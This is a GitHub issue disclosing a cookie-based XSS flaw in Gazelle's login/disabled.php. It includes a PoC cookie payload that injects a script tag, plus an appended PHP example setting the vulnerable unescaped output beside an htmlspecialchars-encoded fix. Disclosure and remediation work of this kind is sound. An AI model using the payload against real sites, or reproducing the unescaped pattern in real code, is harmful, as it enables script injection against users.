Open xjzzzxx opened 1 month ago
Hello,
I would like to report an XSS vulnerability in Gazelle commit 63b3370.
In file https://github.com/WhatCD/Gazelle/blob/master/sections/login/disabled.php
...
<form action="" method="POST">
<input type="email" class="inputtext" placeholder="Email Address" name="email" required />
<input type="submit" value="Submit" />
<input type="hidden" name="username" value="<?=$_COOKIE['username']?>" /> // Line 25
</form><br /><br />
...
Source from $_COOKIE['username'] without any filtering or checking, which results in XSS.
PoC:
GET sections/login/disabled.php
With the Cookie
username=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22
BTW, cms.gazelle.com is local (changed hosts).
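The pattern reported above next to an attribute-encoded version, as an added example that is not part of the original report and not Gazelle's own code. The function names are hypothetical, and the sample cookie is the value from the report, embedded as constructed input.

```php
<?php
declare(strict_types=1);

// Before: the pattern from line 25 of disabled.php, cookie value echoed raw
// into a double-quoted attribute.
function render_username_field_vulnerable(array $cookies): string
{
    $username = $cookies['username'] ?? '';
    return '<input type="hidden" name="username" value="' . $username . '" />';
}

// After: encode for the HTML attribute context. ENT_QUOTES encodes both quote
// styles; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
function render_username_field_escaped(array $cookies): string
{
    $username = $cookies['username'] ?? '';
    if (!is_string($username)) {
        // A cookie sent as username[]=x reaches PHP as an array; treat as empty.
        $username = '';
    }
    $safe = htmlspecialchars($username, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="username" value="' . $safe . '" />';
}

// Constructed input: the cookie value from the report, URL-decoded the way
// PHP decodes it when populating $_COOKIE.
$cookies = [
    'username' => urldecode('%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22'),
];

$raw  = render_username_field_vulnerable($cookies);
$safe = render_username_field_escaped($cookies);

echo "raw:     ", $raw, PHP_EOL;
echo "escaped: ", $safe, PHP_EOL;

// The raw form closes the attribute and emits a live <script> element;
// the escaped form keeps the whole value inside the attribute as entities.
if (strpos($raw, '"><script>') === false) {
    throw new RuntimeException('expected the raw output to break out of the attribute');
}
if (strpos($safe, '<script>') !== false || strpos($safe, '&quot;&gt;&lt;script&gt;') === false) {
    throw new RuntimeException('expected the escaped output to contain only entities');
}
```

Encoding at the point of output is what closes this sink; a cookie is client-controlled input like any request parameter, so it needs the same handling as `$_GET` or `$_POST` values.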
Pretty deep space vulnerability that one but good demonstration.